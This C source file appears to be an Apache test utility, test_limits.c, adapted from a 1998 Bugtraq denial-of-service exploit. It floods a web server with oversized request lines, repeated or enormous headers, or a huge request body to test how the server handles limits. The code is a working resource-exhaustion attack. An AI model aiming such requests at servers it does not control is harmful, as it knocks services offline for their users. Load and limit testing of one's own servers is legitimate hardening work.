1/************************************************************** 2 * test_limits.c 3 * 4 * A simple program for sending abusive requests to a server, based 5 * on the sioux.c exploit code that this nimrod posted (see below). 6 * Roy added options for testing long header fieldsize (-t h), long 7 * request-lines (-t r), and a long request body (-t b). 8 * 9 * FreeBSD 2.2.x, FreeBSD 3.0, IRIX 5.3, IRIX 6.2: 10 * gcc -o test_limits test_limits.c 11 * 12 * Solaris 2.5.1: 13 * gcc -o test_limits test_limits.c -lsocket -lnsl 14 * 15 * 16 * Message-ID: <861zqspvtw.fsf@niobe.ewox.org> 17 * Date: Fri, 7 Aug 1998 19:04:27 +0200 18 * Sender: Bugtraq List <BUGTRAQ@netspace.org> 19 * From: Dag-Erling Coidan =?ISO-8859-1?Q?Sm=F8rgrav?= <finrod@EWOX.ORG> 20 * Subject: YA Apache DoS attack 21 * 22 * Copyright (c) 1998 Dag-Erling Codan Smrgrav 23 * All rights reserved. 24 * 25 * Redistribution and use in source and binary forms, with or without 26 * modification, are permitted provided that the following conditions 27 * are met: 28 * 1. Redistributions of source code must retain the above copyright 29 * notice, this list of conditions and the following disclaimer 30 * in this position and unchanged. 31 * 2. Redistributions in binary form must reproduce the above copyright 32 * notice, this list of conditions and the following disclaimer in the 33 * documentation and/or other materials provided with the distribution. 34 * 3. The name of the author may not be used to endorse or promote products 35 * derived from this software withough specific prior written permission 36 * 37 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 38 * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 39 * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 40 * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 41 * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 42 * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 43 * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 44 * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 45 * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 46 * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 47 * 48 */ 49 50/* 51 * Kudos to Mark Huizer who originally suggested this on freebsd-current 52 */ 53 54#include <sys/types.h> 55#include <sys/uio.h> 56 57#include <sys/socket.h> 58#include <netinet/in.h> 59 60#include <netdb.h> 61#include <stdio.h> 62#include <stdlib.h> 63#include <string.h> 64#include <unistd.h> 65 66#define TEST_LONG_REQUEST_LINE 1 67#define TEST_LONG_REQUEST_FIELDS 2 68#define TEST_LONG_REQUEST_FIELDSIZE 3 69#define TEST_LONG_REQUEST_BODY 4 70 71void 72usage(void) 73{ 74 fprintf(stderr, 75 "usage: test_limits [-t (r|n|h|b)] [-a address] [-p port] [-n num]\n"); 76 exit(1); 77} 78 79int 80main(int argc, char *argv[]) 81{ 82 struct sockaddr_in sin; 83 struct hostent *he; 84 FILE *f; 85 int o, sd; 86 87 /* default parameters */ 88 char *addr = "localhost"; 89 int port = 80; 90 int num = 1000; 91 int testtype = TEST_LONG_REQUEST_FIELDS; 92 93 /* get options */ 94 while ((o = getopt(argc, argv, "t:a:p:n:")) != EOF) 95 switch (o) { 96 case 't': 97 if (*optarg == 'r') 98 testtype = TEST_LONG_REQUEST_LINE; 99 else if (*optarg == 'n') 100 testtype = TEST_LONG_REQUEST_FIELDS; 101 else if (*optarg == 'h') 102 testtype = TEST_LONG_REQUEST_FIELDSIZE; 103 else if (*optarg == 'b') 104 testtype = TEST_LONG_REQUEST_BODY; 105 break; 106 case 'a': 107 addr = optarg; 108 break; 109 case 'p': 110 port = atoi(optarg); 111 break; 112 case 'n': 113 num = atoi(optarg); 114 break; 115 default: 116 usage(); 117 } 118 119 if (argc != optind) 120 usage(); 121 122 /* connect */ 123 if ((he = gethostbyname(addr)) == NULL) { 124 perror("gethostbyname"); 125 exit(1); 126 } 127 bzero(&sin, sizeof(sin)); 128 bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); 129 sin.sin_family = he->h_addrtype; 130 sin.sin_port = htons(port); 131 132 if ((sd = socket(sin.sin_family, SOCK_STREAM, IPPROTO_TCP)) == -1) { 133 perror("socket"); 134 exit(1); 135 } 136 137 if (connect(sd, (struct sockaddr *)&sin, sizeof(sin)) == -1) { 138 perror("connect"); 139 exit(1); 140 } 141 142 if ((f = fdopen(sd, "r+")) == NULL) { 143 perror("fdopen"); 144 exit(1); 145 } 146 147 /* attack! */ 148 fprintf(stderr, "Testing like a plague of locusts on %s\n", addr); 149 150 if (testtype == TEST_LONG_REQUEST_LINE) { 151 fprintf(f, "GET "); 152 while (num-- && !ferror(f)) { 153 fprintf(f, "/123456789"); 154 fflush(f); 155 } 156 fprintf(f, " HTTP/1.0\r\n\r\n"); 157 } 158 else { 159 fprintf(f, "GET /fred/foo HTTP/1.0\r\n"); 160 161 if (testtype == TEST_LONG_REQUEST_FIELDSIZE) { 162 while (num-- && !ferror(f)) { 163 fprintf(f, "User-Agent: sioux"); 164 fflush(f); 165 } 166 fprintf(f, "\r\n"); 167 } 168 else if (testtype == TEST_LONG_REQUEST_FIELDS) { 169 while (num-- && !ferror(f)) 170 fprintf(f, "User-Agent: sioux\r\n"); 171 fprintf(f, "\r\n"); 172 } 173 else if (testtype == TEST_LONG_REQUEST_BODY) { 174 fprintf(f, "User-Agent: sioux\r\n"); 175 fprintf(f, "Content-Length: 33554433\r\n"); 176 fprintf(f, "\r\n"); 177 while (num-- && !ferror(f)) 178 fprintf(f, "User-Agent: sioux\r\n"); 179 } 180 else { 181 fprintf(f, "\r\n"); 182 } 183 } 184 fflush(f); 185 186 { 187 apr_ssize_t len; 188 char buff[512]; 189 190 while ((len = read(sd, buff, 512)) > 0) 191 len = write(1, buff, len); 192 } 193 if (ferror(f)) { 194 perror("fprintf"); 195 exit(1); 196 } 197 198 fclose(f); 199 exit(0); 200} 201